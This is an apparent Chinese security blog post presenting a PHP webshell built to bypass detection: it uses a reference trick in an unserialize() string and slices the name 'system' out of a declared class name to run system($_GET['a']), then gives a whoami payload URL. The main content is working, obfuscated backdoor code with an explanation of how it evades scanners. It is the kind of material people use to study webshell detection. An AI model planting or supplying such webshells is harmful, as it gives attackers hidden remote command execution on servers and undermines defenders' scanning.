WEB安全--RCE--webshell bypass2

继WEB安全--RCE--webshell bypass的补充:

六、PHP反序列化

webshell:

php 复制代码
<?php
$s= 
unserialize('a:2:{i:0;O:8:"stdClass":1:{s:1:"a";i:1;}i:1;r:2;}');
$c = "123";
$arr= get_declared_classes();
$i=0;

for($i;$i<count($arr);$i++){
 $i++;
 $s[1]->a=$_GET['a'];
 if($i<97 || $i>=98){
 continue;
 }
 $c=$s[0]->a;
 print(substr(get_declared_classes()[55],4,6)($c));
}
?>

原理:

打印$s:

可以看到$s反序列化后有两个值,但是源码中似乎只有一个stdClass;原因是[0]是由[1]引用复制后的值,可以理解为**[1]的变化会导致[0]的变化**。

打印$arr:

基于上述两个打印值对源码进行分析,我们不难得出其原理:

一开始$c = "123",进入for循环;

s\[1\]-\>a = _GET['a']一直在接收我们的传参,不过由于if判断,当$i = 97时才会进入下一步;

此时s\[1\]-\>a的值是我们URL传递的参数,而c = s\[0\]-\>a,且s[1]->a 的值会同步影响s\[0\]-\>a,所以c = $_GET['a'];

get_declared_classes()[55]对应的是FilesystemIterator,通过截取取出system;

最后 print(substr(get_declared_classes()[55],4,6)($c)) 就会变成:

print(system($_GET['a']))

payload:

php 复制代码
http://127.0.0.1/rce/bypass.php?a=whoami
相关推荐
HMS Core1 小时前
HarmonyOS免密认证方案 助力应用登录安全升级
安全·华为·harmonyos
Gauss松鼠会2 小时前
GaussDB权限管理:从RBAC到精细化控制的企业级安全实践
大数据·数据库·安全·database·gaussdb
小赖同学啊4 小时前
基于区块链的物联网(IoT)安全通信与数据共享的典型实例
物联网·安全·区块链
安全系统学习11 小时前
网络安全之SQL RCE漏洞
安全·web安全·网络安全·渗透测试
聚铭网络16 小时前
案例精选 | 某省级税务局AI大数据日志审计中台应用实践
大数据·人工智能·web安全
GLAB-Mary17 小时前
AI会取代网络工程师吗?理解AI在网络安全中的角色
网络·人工智能·web安全
hanniuniu1317 小时前
AI时代API挑战加剧,API安全厂商F5护航企业数字未来
人工智能·安全
zhulangfly18 小时前
API接口安全-1:身份认证之传统Token VS JWT
安全
时时三省19 小时前
【时时三省】vectorcast使用教程
安全·安全架构
galaxylove20 小时前
Gartner发布最新指南:企业要构建防御性强且敏捷的网络安全计划以平衡安全保障与业务运营
网络·安全·web安全